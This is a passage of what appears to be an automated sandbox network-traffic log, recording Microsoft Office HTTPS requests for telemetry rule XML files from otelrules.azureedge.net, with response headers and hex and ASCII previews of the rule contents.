                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:18 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1405
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                                                                                                            x-ms-request-id: 8564bbda-801e-008c-051b-417130000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180018Z-174f7845968pght8hC1EWRyvxg00000009b000000000r4zp
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:18 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            134192.168.2.45012613.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:18 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:18 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1368
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                                                                                                            x-ms-request-id: fe90239e-101e-0017-14ee-4447c7000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180018Z-174f784596886s2bhC1EWR743w000000169g00000000fz75
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:18 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            135192.168.2.45012413.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:18 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:18 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1352
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                                                                                                            x-ms-request-id: 5bfdc617-b01e-001e-76f1-410214000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180018Z-174f7845968psccphC1EWRuz9s00000016gg00000000e6bg
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:18 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            136192.168.2.45012713.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:18 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:18 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1401
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE055B528"
                                                                                                                                                                                                                                                                            x-ms-request-id: e9f7249a-b01e-00ab-72be-42dafd000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180018Z-174f7845968kdththC1EWRzvxn0000000kk000000000nqss
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:18 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            137192.168.2.45012813.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:19 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:19 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:19 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1364
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE1223606"
                                                                                                                                                                                                                                                                            x-ms-request-id: abb43699-601e-00ab-6df2-4466f4000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180019Z-174f7845968n2hr8hC1EWR9cag00000015vg00000000nqma
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:19 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            138192.168.2.45013313.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:20 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:20 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:20 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1360
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                                                                                                            x-ms-request-id: 6c50be25-301e-003f-6fee-44266f000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180020Z-174f7845968ljs8phC1EWRe6en000000161000000000t8m4
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:20 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            139192.168.2.45013213.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:20 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:20 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1397
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE7262739"
                                                                                                                                                                                                                                                                            x-ms-request-id: f24b5158-501e-0047-6a59-43ce6c000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180020Z-174f7845968kdththC1EWRzvxn0000000kq00000000069uw
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:21 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            140192.168.2.45013513.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:20 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:20 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                                                                                                            x-ms-request-id: b7ec0bbd-e01e-0071-43ee-4408e7000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180020Z-174f7845968swgbqhC1EWRmnb400000016a000000000wncw
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:21 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            141192.168.2.45013413.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:20 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:20 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                                                                                                            x-ms-request-id: 580008bf-301e-0000-1d8a-3feecc000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180020Z-174f7845968ljs8phC1EWRe6en000000162g00000000m3pv
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:21 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            142192.168.2.45014313.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:21 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
